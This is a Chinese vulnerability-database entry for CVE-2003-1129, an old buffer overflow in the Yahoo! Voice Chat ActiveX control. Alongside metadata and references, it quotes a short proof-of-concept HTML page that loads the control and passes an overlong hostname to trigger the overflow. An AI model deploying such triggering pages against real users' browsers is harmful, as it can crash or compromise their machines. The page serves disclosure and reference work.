Yahoo! Voice Chat ActiveX控件远程漏洞

Yahoo! Voice Chat ActiveX控件远程漏洞

漏洞ID 1107317 漏洞类型 边界条件错误
发布时间 2003-05-12 更新时间 2005-10-20
图片[1]-Yahoo! Voice Chat ActiveX控件远程漏洞-安全小百科CVE编号 CVE-2003-1129
图片[2]-Yahoo! Voice Chat ActiveX控件远程漏洞-安全小百科CNNVD-ID CNNVD-200312-431
漏洞平台 Windows CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/22593
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-431
|漏洞详情
Yahoo!VoiceChat是一款音频聊天程序,以ActiveX控件形式安装。Yahoo!VoiceChatActiveX控件存在一个漏洞,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,触发漏洞。目前没有详细漏洞细节提供,此漏洞将会在以后更新。
|漏洞EXP
source: http://www.securityfocus.com/bid/7561/info

It has been reported that the ActiveX control used by the Yahoo! Voice Chat feature is prone to an exploitable buffer overflow vulnerability. This issue can be exploited via a malicious web page that calls the vulnerable control with malformed parameters. Although unconfirmed, it has been conjectured that this condition may be exploited to execute arbitrary code. 

------sample.htm-----------
<OBJECT id=yahooaudio type="application/x-oleobject"

classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498">
</OBJECT>
<script>
yahooaudio.hostname="longstringheremorethan500chars";
yahooaudio.createandjoinconference();
</script>
---------------------------
|参考资料

来源:US-CERTVulnerabilityNote:VU#272644
名称:VU#272644
链接:http://www.kb.cert.org/vuls/id/272644
来源:BUGTRAQ
名称:20030530Yahoo!SecurityAdvisory:Yahoo!VoiceChat
链接:http://www.securityfocus.com/archive/1/323439
来源:SECUNIA
名称:8924
链接:http://secunia.com/advisories/8924
来源:XF
名称:yahoo-audio-bo(12130)
链接:http://xforce.iss.net/xforce/xfdb/12130
来源:BID
名称:7561
链接:http://www.securityfocus.com/bid/7561
来源:help.yahoo.com
链接:http://help.yahoo.com/help/us/mesg/use/use-45.html
来源:NSFOCUS
名称:4824
链接:http://www.nsfocus.net/vulndb/4824

相关推荐: Apple Mac OSX Internet Connect Insecure Temporary File Handling Symbolic Link Vulnerability

Apple Mac OSX Internet Connect Insecure Temporary File Handling Symbolic Link Vulnerability 漏洞ID 1098215 漏洞类型 Design Error 发布时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享